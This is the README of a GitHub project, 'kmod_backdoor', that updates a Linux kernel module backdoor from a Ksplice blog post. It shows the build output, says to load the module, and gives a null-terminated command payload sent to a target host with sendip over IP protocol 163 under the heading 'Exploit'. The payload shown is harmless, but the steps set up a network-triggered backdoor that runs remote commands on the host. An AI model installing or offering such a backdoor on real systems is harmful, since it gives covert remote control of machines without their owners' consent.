/kmod_backdoor

An up to date module for the backdoor described in the ksplice blog. https://blogs.oracle.com/ksplice/entry/hosting_backdoors_in_hardware

Primary LanguageC

kmod_backdoor

An up to date module for the backdoor described in the ksplice blog. https://blogs.oracle.com/ksplice/entry/hosting_backdoors_in_hardware This code includes some fixes to allow us to defer calls to call_usermodhelper.

Steps

  • Compile the code by running make
$ make
make -C /lib/modules/3.2.0-4-amd64/build SUBDIRS=/home/lmwangi/backdoor modules
make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-amd64'
  Building modules, stage 2.
  MODPOST 3 modules
make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-amd64'
  • Insmod the relevant module.

  • Create a payload that sendip will use. The cmd string must be null terminated.

$ hexdump -C payload
00000000  74 6f 75 63 68 20 2f 74  6d 70 2f 78 00           |touch /tmp/x.|
0000000d
  • Exploit
$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload 192.168.127.108